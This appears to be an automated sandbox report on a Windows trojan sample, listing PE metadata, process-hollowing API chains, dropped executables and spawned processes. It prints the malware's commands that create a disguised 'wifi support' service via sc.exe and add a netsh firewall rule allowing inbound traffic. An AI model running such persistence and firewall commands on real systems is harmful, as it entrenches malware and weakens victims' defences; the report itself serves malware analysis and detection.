                          Source: NNOKmCIVoi.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8F03.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8F03.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8F03.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7DB.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7DB.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7DB.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C71D.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E3A0.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 3412.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 3412.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 3412.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 12CC.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 12CC.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 12CC.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 454.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 454.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 454.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: eugcwgv.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: eugcwgv.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: eugcwgv.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: qflfaqod.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: qflfaqod.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: qflfaqod.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeSection loaded: mscorjit.dll
                          Source: NNOKmCIVoi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: String function: 00405740 appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: String function: 02092794 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00470110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_05ACF5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_05ACF6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: NNOKmCIVoi.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 8F03.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: A7DB.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 3412.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 12CC.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 454.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: eugcwgv.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: qflfaqod.exe.25.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: C71D.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          Source: D78A.exe.6.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: C71D.exe.6.drStatic PE information: Section: .edata ZLIB complexity 0.999570876842
                          Source: D78A.exe.6.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: E3A0.exe.6.drStatic PE information: Section: .didata ZLIB complexity 0.999460927619
                          Source: NNOKmCIVoi.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eugcwgvJump to behavior
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@61/32@83/20
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: NNOKmCIVoi.exeVirustotal: Detection: 32%
                          Source: NNOKmCIVoi.exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\NNOKmCIVoi.exe "C:\Users\user\Desktop\NNOKmCIVoi.exe"
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeProcess created: C:\Users\user\Desktop\NNOKmCIVoi.exe "C:\Users\user\Desktop\NNOKmCIVoi.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\eugcwgv C:\Users\user\AppData\Roaming\eugcwgv
                          Source: C:\Users\user\AppData\Roaming\eugcwgvProcess created: C:\Users\user\AppData\Roaming\eugcwgv C:\Users\user\AppData\Roaming\eugcwgv
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3412.exe C:\Users\user\AppData\Local\Temp\3412.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2196 -ip 2196
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 520
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\454.exe C:\Users\user\AppData\Local\Temp\454.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\12CC.exe C:\Users\user\AppData\Local\Temp\12CC.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2655.exe C:\Users\user\AppData\Local\Temp\2655.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hdysgoc\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description hdysgoc "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start hdysgoc
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d"C:\Users\user\AppData\Local\Temp\12CC.exe"
                          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess created: C:\Users\user\AppData\Local\Temp\2655.exe C:\Users\user\AppData\Local\Temp\2655.exe
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1316 -ip 1316
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 8
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8F03.exe C:\Users\user\AppData\Local\Temp\8F03.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A7DB.exe C:\Users\user\AppData\Local\Temp\A7DB.exe
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeProcess created: C:\Users\user\Desktop\NNOKmCIVoi.exe "C:\Users\user\Desktop\NNOKmCIVoi.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3412.exe C:\Users\user\AppData\Local\Temp\3412.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\454.exe C:\Users\user\AppData\Local\Temp\454.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2655.exe C:\Users\user\AppData\Local\Temp\2655.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                          Source: C:\Users\user\AppData\Roaming\eugcwgvProcess created: C:\Users\user\AppData\Roaming\eugcwgv C:\Users\user\AppData\Roaming\eugcwgv
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2196 -ip 2196
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 520
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1316 -ip 1316
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 8
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hdysgoc\
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description hdysgoc "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start hdysgoc
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess created: C:\Users\user\AppData\Local\Temp\2655.exe C:\Users\user\AppData\Local\Temp\2655.exe
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3412.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2196
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5168:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6388:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_01
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCommand line argument: kernel32.dll
                          Source: 2655.exe.6.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 2655.exe.6.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.0.2655.exe.f80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.0.2655.exe.f80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.0.2655.exe.f80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.0.2655.exe.f80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.0.2655.exe.f80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.0.2655.exe.f80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.2.2655.exe.f80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 26.2.2655.exe.f80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: NNOKmCIVoi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 3412.exe, 00000014.00000000.368430619.0000000000413000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.359444132.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000017.00000002.423473511.00000000052B0000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000017.00000003.373977412.0000000003115000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.373926704.0000000004EA7000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.374942488.0000000003115000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
